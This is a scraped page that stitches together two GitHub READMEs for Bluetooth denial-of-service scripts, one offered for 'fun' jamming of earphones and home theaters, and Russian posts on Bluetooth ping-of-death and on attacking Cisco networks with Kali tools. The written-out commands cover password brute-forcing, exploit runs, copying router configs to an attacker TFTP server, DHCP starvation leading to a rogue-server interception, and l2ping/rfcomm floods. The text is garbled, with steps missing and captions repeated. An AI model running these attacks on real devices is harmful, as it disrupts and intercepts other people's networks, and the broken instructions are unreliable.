Bluetooth deauth kali linux

Saved searches

Use saved searches to filter your results more quickly

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.

This is very usefull bluetooth jammer or doser tool in kali or parrot linux.

License

Anlos0023/bluedoser

This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Sign In Required

Please sign in to use Codespaces.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio Code

Your codespace will open once ready.

There was a problem preparing your codespace, please try again.

Latest commit

Git stats

Files

Failed to load latest commit information.

README.md

For bluetooth jamming..dosing. Use this tool.. Fun in jamming or dosing Bluetooth related devices like Hometheater,Erphones,etc.

#Installation# git clone https://github.com/Anlos0023/bluedoser.git cd bluedoser chmod 7777 bluedoser.sh ./bluedoser.sh

About

This is very usefull bluetooth jammer or doser tool in kali or parrot linux.

Источник

Bluetooth dos (ping of death) attack. ⁠ ⁠

Bluetooth dos (ping of death) attack. Информационная безопасность, Bluetooth, Kali linux, Длиннопост

Вся информация представлена в ознакомительных целях и автор не несет ответственности за ваши действия.

Bluetooth dos (ping of death) attack. Информационная безопасность, Bluetooth, Kali linux, Длиннопост

Сегодня речь пойдет о такой интересной теме как рызрыв соединения bluetooth.
К сожалению информации о том как оборвать соединение bluetooth довольно мало, а приложений которые бы делали это сами я не нашел, поэтому это нужно делать из под операционной системы Kali linux, как ее установить полно информации.

Читайте также:  Kia rio 2021 bluetooth

Итак начнем, для начала нужно открыть терминал, работать будем с websploit (можно и через wifite, но существеннрй разницы нет), чтобы установить websploit необходимо ввести следующие команды:
Установка зависимостей

sudo apt-get install scapy

tar xzf WebSploit\ Framework\ V.X.X.X.tar.gz

Запускаем скрипт установки

Ждем
После этого в терминале введите:

Появится похожая штука, значит все сделано правильно.

Bluetooth dos (ping of death) attack. Информационная безопасность, Bluetooth, Kali linux, Длиннопост

Bluetooth dos (ping of death) attack. Информационная безопасность, Bluetooth, Kali linux, Длиннопост

Этой командой мы задаем адрес атакуемого.

Вместо нулей адрес жертвы.
Узнать его можно как в самом терминале так и приложением с телефона, в терминале сканируем так:
Велючаем bluetooth

Далее появится список устройств с их мак адресами, этот адрес забиваем вместо 00:00:00:00:00:00.
Затем вводим

Начинается атака, bluetooth соединение должно оборваться.
Кому интересно попробуйте сделать тоже самое, но с помощью termux на телефоне, к сожалению у меня какие-то проблемы с bluetooth, поэтому провести атаку не получается.
Вот команды для termux:

Bluetooth dos (ping of death) attack. Информационная безопасность, Bluetooth, Kali linux, Длиннопост

Если использовать направленную антенну, можно отключить беспроводную колонку. Надо попробовать.

Смотрю пикабу сжал ссылку, вот полный туториал по установке:
http://darcade.de/linux/websploit-tutorial

Эм не работает бесконечная надпись типо блютуз смерть стартаёт

Повышаем привилегии обычного user до Administrator (RID Hijacking)⁠ ⁠

Интересная уязвимость, благодаря которой можно повысить привилегии обычного юзера до администратора. Уязвисости подвержены все версии Windows начиная с XP и заканчивая Windows 10. Также подвержены и серверные ОС (2003-2016). Патча по сей день нету.

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите.⁠ ⁠

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Атакуем CISCO маршрутизатор

В состав Kali Linux входит несколько инструментов, которые можно использовать для аудита оборудования CISCO. Список можно посмотреть в разделе Vulnerability Analysis — Cisco Tools:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Cisco Audit Tool или CAT

Используется для брутфорса пароля при выключенном режиме aaa-mode, брутфорса SNMP community-строк и проверки на уязвимость IOS History bug ( https://tools.cisco.com/security/center/content/CiscoSecurit. )

CAT -h 192.168.1.209 -w /root/cisco/wordlist/snmpcommunities -a /root/cisco/wordlist/password_list -i

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Cisco Global Exploiter или CGE

Используется для экслпутации известных уязвимостей. Нам доступно 14 атак:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

cge.pl 192.168.1.201 3

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Инструмент для автоматизации поиска устройств со стандартными значениями пароля для telnet и режима enable, который может искать устройства в диапазоне адресов. Может использоваться при сканировании больших сетей.

cisco-ocs 192.168.1.207 192.168.1.209

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Многофункциональный сканер уязвимостей для оборудования Cisco. Может сканировать несколько IP адресов за раз, подгружая из текстового файла. Запускать cisco-torch в Kali Linux следует, находясь в рабочей директории /usr/share/cisco-torch.

Поиск доступных интерфейсов и протоколов и определение типа оборудования.

Читайте также:  Projection laser keyboard wireless bluetooth virtual keyboard

cisco-torch -A 192.168.1.201

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

cisco-torch -s -b 192.168.1.209

Для использования своего словаря, его нужно поместить в /usr/share/cisco-torch вместо файла password.txt

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

copy-router-config.pl и merge-copy-config.pl

Инструменты для загрузки текущей конфигурации маршрутизатора cisco при известной community-строке на свой tftp-сервер. В дальнейшем можно модифицировать конфигурацию и снова загрузить на сервер.

copy-router-config.pl 192.168.1.201 192.168.1.3 private

Для автоматизации подобной атаки, где нас интересует только загрузка конфигурации на свой TFTP-сервер лучше воспользоваться модулем Metasploit auxiliary/scanner/snmp/cisco_config_tftp

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Yersinia — многофункциональный инструмент для атак на протоколы L2 (Data Link) уровня OSI.

Умеет проводить атаки на DHCP, STP, CDP, DTP, HSRP и другие.

Работать с Yersinia можно в нескольких режимах:

Запуск в режиме сервера и управление при помощи команд, похожих на cisco cli.

telnet 127.0.0.1 12000

Пароль для перехода в режим enable – tomac

1. Запуск в интерактивном режиме

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Графический интерфейс GTK

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Графический интерфейс может работать нестабильно. В режиме сервера не поддерживает некоторые виды атак, вроде DHCP Rogue server. Так что, основным режимом запуска можно считать интерактивный режим.

Атакуем DHCP сервер

В качестве примера продемонстрируем атаку на переполнение пула IP-адресов DHCP сервера. Данная атака может быть использована для выведения из строя корпоративного DHCP сервера и последующая его замещение поддельным, конфигудрация которого настроена таким образом, что весь трафик новых клиентов будет проходить через хост атакующего. Таким образом будет проведена одна из атак MitM.

На стороне атакующего можно выполнить скрипт nmap для обнаружения DHCP сервера в локальной сети.

nmap -n —script=broadcast-dhcp-discover

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Теперь запускаем Yersinia в интерактивном режиме и переходим в режим DHCP выбрав его нажатием клавиши g.

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Теперь в этом режиме будут видны все DHCP пакеты, полученные Yersinia.

Проверим список выданных адресов DHCP сервера до атаки:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Yersinia показывает DHCP пакеты, выловленные из сети:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Если выбрать пакет и нажать сочетание клавиш Shift+L то можно затем при помощи атаки RAW пересылать этот пакет в сеть, или модифицировать его при помощи нажатия клавиши e – переход в режим редактирования пакета.

При нажатии на клавишу x получаем список доступных атак:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Видим, что начинает отправлять огромное количество DHCP Discover запросов:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Через некоторое время можно остановить атаку нажатием на клавиши L и затем Enter:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Nmap больше не показывает доступных DHCP серверов в сети. Коропоративный DHCP сервер выведен из строя.

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Проверим таблицу выданных IP-адресов на роутере:

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Далее вы можете запустить атаку Rogue DHCP в Yersinia, либо при помощи модуля Metasploit или любым другим способом, чтобы провести MitM атаку.

Читайте также:  Модуль блютуз код ошибки 43

Атаки на сетевое оборудование с Kali Linux + рекомендации по защите. Информационная безопасность, Взлом, Пентест, Yersinia, Cisco, Kali Linux, Длиннопост

Атаку на истощение пула IP адресов DHCP сервера можно так же провести при помощи инструмента DHCPig. При помощи Yersinia можно проводить атаки и на другие популярные протоколы, такие как STP (Spanning Tree Protocol) и HSRP (Hot Standby Router Protocol), которые так же позволят вам прослушивать трафик в сети.

Атака на переполнение CAM таблицы коммутатора.

Еще одна атака, которая переполняет CAM таблицу коммутатора, хранящую список MAC адресов, работающих на определенном порту. Некоторые коммутаторы при ее переполнении начинают работать как хабы, рассылая пакеты на все порты, тем самым создавая идеальные условия для проведения атак класса MitM.

В Kali Linux для проведения данной атаки присутствует инструмент macof

Где eth0 – интерфейс, к которому подключен коммутатор для атаки.

Источник

Saved searches

Use saved searches to filter your results more quickly

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.

A simple script that makes possible BLE deauthentication!

License

its0x08/blue-deauth

This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Sign In Required

Please sign in to use Codespaces.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio Code

Your codespace will open once ready.

There was a problem preparing your codespace, please try again.

Latest commit

Git stats

Files

Failed to load latest commit information.

README.md

Bluetooth deauthenticator — blue-deauth v0.1.2-alpha

A simple script that makes possible BLE deauthentication!

Bluetooth deauthenticator v0.1.2-beta Attack types: 1.) l2ping - Ping flood 2.) rfcomm - Connect flood [i] Usage: blue_dos.sh target_addr> packet_size> attack_type> root@kali:/scripts/blue-deauth# bash blue_dos.sh FC:58:FA:XX:XX:XX 600 1 root@kali:/scripts/blue-deauth# bash blue_dos.sh FC:58:FA:XX:XX:XX 600 2
l2ping (comes with bluez) rfcomm (comes with bluez) 

Tested only in Kali but any Linux OS that uses bluez should work.

Pull requests and issues are welcome!

About

A simple script that makes possible BLE deauthentication!

Источник

Оцените статью
Adblock
detector